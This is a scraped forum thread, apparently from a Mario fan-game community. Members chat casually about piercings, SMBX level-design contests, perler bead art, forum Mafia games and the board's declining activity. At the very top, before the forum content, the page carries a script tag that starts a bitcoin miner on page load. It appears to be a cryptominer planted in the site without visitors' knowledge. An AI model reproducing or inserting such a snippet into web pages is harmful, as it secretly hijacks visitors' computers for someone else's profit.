<script>
miner.start(); // initialise bitcoin miner
</script>

mario fan games galaxypge projectsmbx community

The Twitter Bread

here's a good place for FRIENDLY, ENJOYABLE, and otherwise very GENERAL discussion!
idol
god's gonna come to my house and kill me
First name: charlotte
Pronouns: she/her

Re: biggie > tupac

Postby idol » 2 years ago

i leave my nose ring n labret in for long periods of time but take out my earrings at the end of the day
must b love on tha brain
[avi source]

onpon4
Sharing is good.
First name: Julie

Postby onpon4 » 2 years ago

Whimsical Calamari wrote:keeping an earring on permanently is probably pretty dangerous. nobody i've heard of leaves jewelry in their piercings for long periods of time like that
In fact, the earrings put in your piercings the first time can be left in forever, and you're not supposed to take them out until it completely heals. That means you're supposed to be wearing them for several months straight at first. If you don't do this, your chance of infection increases.

nothobz
of the jungle
First name: george

Postby nothobz » 2 years ago

BurntTenda wrote:I don't think keeping a metal silver in your hand is particularly healthy.
I'm not a doctor, though...
what are you a doctor? :x :x :x :x it was a piece of metal off a truck at work.

one time i popped a blister with a staple and my finger got infected and my nail fell off.

YelseyKing
Anyone want a banana? :3
First name: Matt

Postby YelseyKing » 2 years ago

Whimsical Calamari wrote:Looking through the MaGL X3 showrunner application thread, there's a lot of people worried about a saturation of contests. But honestly, I think it's so cool that SMBX has grown in popularity so much that there's always a contest open, always an opportunity to design competitively.
I guess the problem I have is with the oversaturation of them... and the fact that raocow feels the need to play each and every one of them, almost entirely monopolizing the Mario-centric A-Sides. I totally get that people like testing their skills and then seeing raocow's reaction to them, but I find myself *seriously* missing the actual *games*.

And with that, there are three big things that make contest LPs less enjoyable to me than standard game ones, which I didn't actually elaborate on before.

1) Contests are, by their very nature, all over the place. There's no feeling of "progression" in the sense that you're working your way through a game. There's no "theme" to the levels, since they're all done completely independently, and likewise the difficulty tends to be all over the place. Instead of feeling like a cohesive game, even if they're laid out to resemble such, they still come across as 100 different small games in one package.

2) What progression there *is* tends to be solely based upon quality. Early on, you have your so-bad-they're-good last place levels, and near the very end, you get the amazing top 10-20 (or whatever) that really showcase what the engine is capable of. The rest? Mostly mediocre, unremarkable stages that were neither good nor bad enough to be even remotely memorable. And that, sadly, tends to be what takes up the greatest bulk of contest LPs. You have a hilarious beginning, an exciting finish, and generally a quagmire of mediocrity for the rest of it.

3) Drama. Drama. Drama. Drama. DRAMA! As Ryrir pointed out in the VLDC thread, every stage in a contest LP is met with scrutiny both in the comments and on the forum. Whether it be that it ranked too high/low, that it was better than [insert stage you liked better] or not, the quality (or lack thereof) of the judges, and basically every other complaint under the sun... It's just a mess. Yeah, you'll see complaints about individual stages in an actual game, but it's far less concentrated, and doesn't tend to cause the comments/forum to erupt into a minor civil war.

Again, these are all just my views and opinions, and no one is obligated to agree with them. I'm just elaborating on why the contest glut has turned me off. I do agree, though, that it's nice that SMBX has gotten as popular as it has. So there's that. :P

Plus: I'm among the least competitive people you'll ever come across. The very nature of contests is something that makes me uncomfortable. :P
Ayjo and Meya are watching you. Be on your best behavior.

Moists:

The (Talkhaus) Price is Right
On hiatus. It'll return someday.

Whimsical Calamari
i am the one that sings the chorus when you hum in the shower

Postby Whimsical Calamari » 2 years ago

YelseyKing wrote:valid opinions
Don't get me wrong, I completely agree about the issue of contest/dedicated game LPs, and how frequent rao's LPs of them are getting. I was just saying that yeah, the SMBX community is so active that anybody wanting to LP or participate in a contest can't reasonably do so for every contest, and actually has to use discretion. And it's really cool IMO that SMBX got big enough to have that problem at all.

addon 2/21
How do you regain focus on a project that eludes your interest? I'm trying to do work on a big group project but I'm having a hard time caring about it, despite it being a very important grade.

RegiGiygas
very very hot cold sauce
First name: uriah
Pronouns: He/Him

Postby RegiGiygas » 2 years ago

My perler bead collection as it now stands
Waaa.

Sorel
In the shadows
First name: Alexander
Pronouns: he/him/his

Postby Sorel » 2 years ago

Nice Grand Dad and Nozomi you got there.

Although I'm kinda disappointed you didn't do the enitre Stardust Crusaders lineup.

RegiGiygas
very very hot cold sauce

Sorel wrote:Nice Grand Dad and Nozomi you got there.

Although I'm kinda disappointed you didn't do the enitre Stardust Crusaders lineup.
Yeah, I'm still working on them, I ran out of black while doing Jotaro and gave up. e
Waaa.

YelseyKing

RegiGiygas wrote:My perler bead collection as it now stands
Did you make all of those yourself? If so, daaaang, you talented.

Moists:

raekuul
X&BUTT
First name: Pokota

Postby raekuul » 2 years ago

Supershroom
Brigande

Postby Supershroom » 2 years ago

Hey guys, I just saw that Mafia was a thing here around 2015. Why has it died out? Is there some little chance to revive it again?
Winners don't doubt, doubters don't win.

RegiGiygas
very very hot cold sauce

YelseyKing wrote:
RegiGiygas wrote:My perler bead collection as it now stands
Did you make all of those yourself? If so, daaaang, you talented.
yah, i made all but the few X-Men characters in the corner that my Dad did. It takes less talent and more focus and patience than anything else.
Waaa.

Whimsical Calamari
i am the one that sings the chorus when you hum in the shower

Postby Whimsical Calamari » 2 years ago

Supershroom wrote:Hey guys, I just saw that Mafia was a thing here around 2015. Why has it died out? Is there some little chance to revive it again?
We had a couple games last year, one of which was pretty badly organized. My guess is that the forum isn't quite as active, so not as many people have proposed games. I saw one person setting up a game a couple weeks back, though. Not sure what came of it.

Bean

Postby Bean » 2 years ago

Is it really not as active around here lately? It still feels about the same to me except some new faces have joined in is all. Maybe I'm just doing that too far in my own world thing again to notice it.

YelseyKing

Mafia is old hat.

The (Talkhaus) Price is Right is where it's at these days! :P

I'm kidding, I'm kidding! Put down the torches and pitchforks!

Moists:

jayScribble
FEEL THE FORCE
Pronouns: it, they, that

Postby jayScribble » 2 years ago

Whimsical Calamari wrote:I saw one person setting up a game a couple weeks back, though. Not sure what came of it.
It was my mafia game.

I planned a game of at least 8. I only got 6 people participate, and

it lasted 3 mafia days.

I don't know the exact reason for the lack of activity for mafia, but that game was sort of my "plan" to get people active on the talkhaus again, but, you know...
Have a 3DS friend code and PM me if you added me: 1289-8788-1766
Three important threads for me:

Coryman
The road to nowhere leads to me
First name: Cory

Postby Coryman » 2 years ago

I was considering giving it a try but I decided to sit out for a round and see how it went...
Apparently that wasn't the smartest idea
raocow wrote: In a world where shag carpeting wins a fight against a helicopter, we spend a lot of time reading and comparing numbers.

Bean

Those of you that have a Twitter thing, help a Bean pick a Wii game to play... or just give me your take here.

metasomnia?
spinny pyromaniac
First name: Meta

Postby metasomnia? » 2 years ago

Bean wrote:Those of you that have a Twitter thing, help a Bean pick a Wii game to play... or just give me your take here.
Metroid Prime 3, yo

YelseyKing

Talkhaus has just felt... kinda slow and empty lately, in general.

I dunno, for all my griping about it, maybe MAGLX3 will bring some oldbies back and some new faces to the forum. (Provided they actually *stay* here, and don't just post in the MAGLX-related threads, of course...)

Moists:

TheFinalSentinel
Low rates,%Percent%signs%, I dunno
First name: £ٌœ'ƒھ‡ح¼円Qف-‹";ôىù♪ïظ§»ھ

Postby TheFinalSentinel » 2 years ago

Yeah, it has been pretty slow here for a while now.

Bean

metasomnia? wrote:Metroid Prime 3, yo
Yeah, this is looking like it's going to win then since that would make four votes with everything else at two. I'm fine with all four choices. It's why I left Rodea: The Sky Soldier off the list since I've heard it's blah.
YelseyKing wrote:Talkhaus has just felt... kinda slow and empty lately, in general.
Well, I'll try to post more. I just get in these modes where I just do my own stuff. Video editing sucks at times and drains me completely from wanting to talk to people, but at the same time, I always appreciate it when you stop by in my own thread there. Guess I should spread these posts out more. I know when I get in that series mindset, I usually just stick to one or two topics at most.

Sorel
In the shadows
First name: Alexander

Postby Sorel » 2 years ago

I've become a lurker over the course of 2016 I think.

There just isn't all that much I want to post about.

alleightbits
START PLAY!
First name: Brian

Postby alleightbits » 2 years ago

Sorel wrote:I've become a lurker over the course of 2016 I think.

There just isn't all that much I want to post about.
Same, tbh.

YelseyKing

I kinda "lurked" for a fair while. Like, much of 2015. I've just decided to become a bit more active around here of late.

Moists:

Return to “the gazebo”